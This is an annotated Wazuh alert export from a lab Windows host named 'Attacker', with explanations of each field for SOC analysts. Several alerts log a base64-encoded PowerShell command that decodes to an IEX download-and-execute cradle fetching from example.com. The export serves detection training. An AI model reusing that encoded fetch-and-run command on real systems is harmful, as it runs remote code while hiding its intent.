No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd47-680a-610b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  15132
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:10.136+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:10.136+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  68
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534290.1553473
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:07.8488294Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284256
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:38:07.834 ProcessGuid: {94294ddc-bd4a-680a-660b-000000000e00} ProcessId: 10844 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_wrzawqio.au1.ps1 CreationUtcTime: 2025-04-24 22:38:07.834 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:07.834
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd4a-680a-660b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10844
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_wrzawqio.au1.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:38:07.834
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:12.393+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:12.393+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  65
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534292.1556242
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:10.3560006Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284299
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:38:09.068 ProcessGuid: {94294ddc-bd51-680a-690b-000000000e00} ProcessId: 10148 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd4a-680a-660b-000000000e00} ParentProcessId: 10844 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:09.068
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd51-680a-690b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10148
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd4a-680a-660b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  10844
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:12.570+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:12.570+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  69
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534292.1564313
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:10.6058844Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284311
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:38:10.562 ProcessGuid: {94294ddc-bd51-680a-690b-000000000e00} ProcessId: 10148 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_fabyeuej.msp.ps1 CreationUtcTime: 2025-04-24 22:38:10.562 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:10.562
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd51-680a-690b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  10148
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_fabyeuej.msp.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:38:10.562
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:38:13.131+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:13.131+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  55
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534293.1567082
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:10.4754770Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43855
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  888
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

